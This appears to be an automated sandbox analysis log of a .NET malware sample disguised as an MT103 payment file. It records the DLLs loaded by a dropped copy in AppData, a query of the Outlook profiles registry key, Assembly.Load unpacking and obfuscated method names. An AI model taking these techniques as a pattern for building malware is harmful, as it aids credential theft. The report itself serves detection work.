                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: rMT103_126021720924.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: rMT103_126021720924.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, uHcF5TZCInwSNV5WnO.cs.Net Code: KZX9KZhvvY System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.rMT103_126021720924.exe.5750000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, uHcF5TZCInwSNV5WnO.cs.Net Code: KZX9KZhvvY System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.rMT103_126021720924.exe.3d05ad0.2.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.rMT103_126021720924.exe.7f40000.6.raw.unpack, uHcF5TZCInwSNV5WnO.cs.Net Code: KZX9KZhvvY System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.rMT103_126021720924.exe.3ce5ab0.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_07843105 push FFFFFF8Bh; iretd 0_2_07843107
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_0784289F push esp; retf 0_2_078428AD
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 0_2_07D37B99 push 0000005Dh; ret 0_2_07D37BFB
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_02970C55 push edi; retf 2_2_02970C7A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_07C02DB8 push esp; retf 3_2_07C02DC5
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_07C0321D push FFFFFF8Bh; iretd 3_2_07C0321F
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_00E1F7C8 pushad ; retf 6_2_00E1F7D1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06BC3DBD push esp; ret 10_2_06BC3DC9
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06BC0882 push es; ret 10_2_06BC0890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_073D289F push esp; retf 10_2_073D28AD
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_00DCF7C8 pushad ; retf 11_2_00DCF7D1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_00DC6A1A pushfd ; iretd 11_2_00DC6A1B
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_06400006 push es; iretd 11_2_0640001C
                    Source: rMT103_126021720924.exeStatic PE information: section name: .text entropy: 7.713016398013977
                    Source: sgxIb.exe.2.drStatic PE information: section name: .text entropy: 7.713016398013977
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, uHcF5TZCInwSNV5WnO.csHigh entropy of concatenated method names: 'Vp4XA8eIFd', 'xmtXFqRKnO', 'LrpXeto7k2', 'biSXMpkNqE', 'TqLXd0dj67', 'FkQXBfXrMf', 'fyUXVdSPfU', 'mjeXIoe27I', 'hNoXi29SRa', 'KhmXg08e5U'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, zWlhLspjUWVR3dcyGm.csHigh entropy of concatenated method names: 'ToString', 'q9XNsA1eMf', 'ORSN5twP6T', 'YmbNn5kPaV', 'mqvNG9vCEI', 'nkHNRHqxyo', 'gyFNPhsCOn', 'wwoNLmVIkU', 'mEfN6yJsQ9', 'mMoN25xdb3'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, dcLWPNR1a5bCJQddKH.csHigh entropy of concatenated method names: 'GdDdOq0ktM', 'adwdJgfNLg', 'K6CMnn20gI', 'gecMGEGq72', 'SxQMRnnXGi', 'uqHMPmgRiX', 'IO6MLVZmXk', 'a5GM6Vl6o8', 'jK0M2sGI7c', 'mAsM4EWVC2'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, sAaok2zrKwxG5KvCC6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FCFwfmNruO', 'uHjwremliF', 'fojwNysTwG', 'zsUwYteQvR', 'cXnwqui7hr', 'er7wwcMuiQ', 'uVNwSTDwpo'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, RdwoPGElFu8kUbgL1F.csHigh entropy of concatenated method names: 'NuwK39YK2', 'xA3TtygF0', 'Ugt3kkNhr', 'fd3Jq95tt', 'aRHmb2uWf', 'mLbDNBdpQ', 'sZUIKOOp6OX6vIMJ1a', 'IQr4UsR7Texp7HaRbV', 'NGpqm2eHo', 'BPKSfuB3g'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, nfPy2DTCIScD4cuJcs.csHigh entropy of concatenated method names: 'mLoYZeYKas', 'ho3YyDP651', 'H2UqcwBHl2', 'qRPqjlUuor', 'KS8Ys2HrUb', 'oWvYaIqGXA', 'chqYQ2IoiE', 'ukvYCgti9s', 'HtlYbCRWie', 'mWgYHo8ktv'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, c1mnmHNNglKhlxjc1V.csHigh entropy of concatenated method names: 'dJ9foMEU7p', 'FZIfm80rvP', 'sZyfUkfUsN', 'Lfvf5isKvR', 'HB3fGc5vyu', 'R23fRhE3M8', 'QIEfLA3ePd', 'SNjf6itCld', 'AF2f4AGR2v', 'QHVfsbauhh'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, TFjHmxCxlj8IovbT7o.csHigh entropy of concatenated method names: 'FmxBAYkMGv', 'OQVBeKTmip', 'PLTBd6FsjO', 'Hn6BVXk3Dp', 'TpyBIXN07L', 'WdIdh6HlqC', 'aAvd012n4h', 'Ur1dEvfiXS', 'fJUdZ06nED', 'd9idxgtrwq'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, zPwlw449bqb1U0EqqG.csHigh entropy of concatenated method names: 'rDkeClyYjl', 'hFaebT560i', 'iMReHkmn6y', 'RgjekLwdQk', 'XCdeh9qlNt', 'qBOe0Mr9lC', 'IkxeET3t0b', 'aYVeZLlO6s', 'H9nexRJ9f9', 'Dukey0eBAP'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, fFIJpeMwQuT4pj0f48.csHigh entropy of concatenated method names: 'hwYqFPF09Y', 'vD7qe1t86H', 'a3ZqMSGa9O', 'AL5qd6KkvD', 'L1LqB0AXVX', 'PJFqVDeyxn', 'Gu8qIE9445', 'gAsqiuqjPk', 'tGXqgLeCtR', 'We9qvEjK4c'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, xwCEAHPbS6YXLQv9Qwr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KWDSC2dtWW', 'BO0SbkYURB', 'l1gSHNkc7K', 'NPlSkslHA5', 'nKdShehJBI', 'xDvS0xcI9N', 'aFPSEDAki1'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, ev453qAf81jeo5XimK.csHigh entropy of concatenated method names: 'Hm6jVEAMtN', 'uYFjIKbvNG', 'DmHjgc7dE3', 'ch9jvIr8U7', 'JfsjrVE2wF', 'bV3jN04IOJ', 'NsSNGVktOrvSYRM4ms', 'iSMo4tagy9TJt5w276', 'qjYjjRvp2T', 'UjBjXyMV6v'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, sYT6qsPWtu0kVrRvODK.csHigh entropy of concatenated method names: 'uRxwtjMKlt', 'a11w1fydeK', 'iP2wK2Onhf', 'zuewT06NVS', 'jCIwO63aRr', 'UXiw3vlLJ7', 's52wJ4Bmh5', 'nD7wopUMvZ', 'lLDwmqCQ8C', 'NCbwDofkwv'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, GF6BPOvncXvdCe5Gu4.csHigh entropy of concatenated method names: 'jlWwj5e4F4', 'nWQwXJp5v9', 'NVyw96EA5s', 'XkbwFJ3WhZ', 'pvtweTMXel', 'wjTwdN15mG', 'vYywBDfxQS', 'ryjqE022Pd', 'lL5qZY7gpK', 'XGZqxRbbn9'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, tELBCGKQIZoR4Ruu4Z.csHigh entropy of concatenated method names: 'pulqUfBCVr', 'ypQq5GjexV', 'rQsqnQIf2T', 'VEeqGoRjif', 'eKNqC34rwR', 'SphqR6EjuK', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, HyCv4jnDM2me7gdh35.csHigh entropy of concatenated method names: 'REWVFjnfdN', 'vlTVMv1VxX', 'ADHVB2QCkU', 'VYpByMUurN', 'ujNBzJ4D9l', 'AZWVcpW57J', 'IO0VjyWt5G', 'EcqVuYn5aU', 'SBVVXODQq0', 'jTFV99vp6M'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, M0eCCbtoMBY8TeihOn.csHigh entropy of concatenated method names: 'Kn2Vtg4Jtb', 'suKV1FhiXM', 'HtRVKe0fAR', 'YotVTxeKqk', 'B6lVOkPArV', 'qOwV3nbDPA', 'jt2VJI5PcM', 'nytVodRGlg', 'QrHVm7ABsa', 'or8VDnmWVy'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, cMmPg8V8IUa5LErlLT.csHigh entropy of concatenated method names: 'Dispose', 'hUGjxLPrNd', 'vfRu5RSely', 'e1S77aCFR3', 'k4rjyjfQnL', 'YoEjzXxpEk', 'ProcessDialogKey', 't2IucFA5ob', 'fpJujG6YCd', 'rO0uugsFQe'
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, z1mXZK9cnNVH49xD2U.csHigh entropy of concatenated method names: 'HaDMTw72Rd', 'FyDM3SWlLV', 'lqwMoQ2y3L', 'HQ1MmwJvDM', 'SLjMrL7m7b', 'BmiMNJbh7M', 'ncRMYyXJK6', 'fKqMqkRfeg', 'SF5MwLjKcS', 'QrYMSxybFD'
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, uHcF5TZCInwSNV5WnO.csHigh entropy of concatenated method names: 'Vp4XA8eIFd', 'xmtXFqRKnO', 'LrpXeto7k2', 'biSXMpkNqE', 'TqLXd0dj67', 'FkQXBfXrMf', 'fyUXVdSPfU', 'mjeXIoe27I', 'hNoXi29SRa', 'KhmXg08e5U'
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, zWlhLspjUWVR3dcyGm.csHigh entropy of concatenated method names: 'ToString', 'q9XNsA1eMf', 'ORSN5twP6T', 'YmbNn5kPaV', 'mqvNG9vCEI', 'nkHNRHqxyo', 'gyFNPhsCOn', 'wwoNLmVIkU', 'mEfN6yJsQ9', 'mMoN25xdb3'
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, dcLWPNR1a5bCJQddKH.csHigh entropy of concatenated method names: 'GdDdOq0ktM', 'adwdJgfNLg', 'K6CMnn20gI', 'gecMGEGq72', 'SxQMRnnXGi', 'uqHMPmgRiX', 'IO6MLVZmXk', 'a5GM6Vl6o8', 'jK0M2sGI7c', 'mAsM4EWVC2'
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, sAaok2zrKwxG5KvCC6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FCFwfmNruO', 'uHjwremliF', 'fojwNysTwG', 'zsUwYteQvR', 'cXnwqui7hr', 'er7wwcMuiQ', 'uVNwSTDwpo'
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, RdwoPGElFu8kUbgL1F.csHigh entropy of concatenated method names: 'NuwK39YK2', 'xA3TtygF0', 'Ugt3kkNhr', 'fd3Jq95tt', 'aRHmb2uWf', 'mLbDNBdpQ', 'sZUIKOOp6OX6vIMJ1a', 'IQr4UsR7Texp7HaRbV', 'NGpqm2eHo', 'BPKSfuB3g'
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, nfPy2DTCIScD4cuJcs.csHigh entropy of concatenated method names: 'mLoYZeYKas', 'ho3YyDP651', 'H2UqcwBHl2', 'qRPqjlUuor', 'KS8Ys2HrUb', 'oWvYaIqGXA', 'chqYQ2IoiE', 'ukvYCgti9s', 'HtlYbCRWie', 'mWgYHo8ktv'
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, c1mnmHNNglKhlxjc1V.csHigh entropy of concatenated method names: 'dJ9foMEU7p', 'FZIfm80rvP', 'sZyfUkfUsN', 'Lfvf5isKvR', 'HB3fGc5vyu', 'R23fRhE3M8', 'QIEfLA3ePd', 'SNjf6itCld', 'AF2f4AGR2v', 'QHVfsbauhh'
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, TFjHmxCxlj8IovbT7o.csHigh entropy of concatenated method names: 'FmxBAYkMGv', 'OQVBeKTmip', 'PLTBd6FsjO', 'Hn6BVXk3Dp', 'TpyBIXN07L', 'WdIdh6HlqC', 'aAvd012n4h', 'Ur1dEvfiXS', 'fJUdZ06nED', 'd9idxgtrwq'
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, zPwlw449bqb1U0EqqG.csHigh entropy of concatenated method names: 'rDkeClyYjl', 'hFaebT560i', 'iMReHkmn6y', 'RgjekLwdQk', 'XCdeh9qlNt', 'qBOe0Mr9lC', 'IkxeET3t0b', 'aYVeZLlO6s', 'H9nexRJ9f9', 'Dukey0eBAP'
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, fFIJpeMwQuT4pj0f48.csHigh entropy of concatenated method names: 'hwYqFPF09Y', 'vD7qe1t86H', 'a3ZqMSGa9O', 'AL5qd6KkvD', 'L1LqB0AXVX', 'PJFqVDeyxn', 'Gu8qIE9445', 'gAsqiuqjPk', 'tGXqgLeCtR', 'We9qvEjK4c'
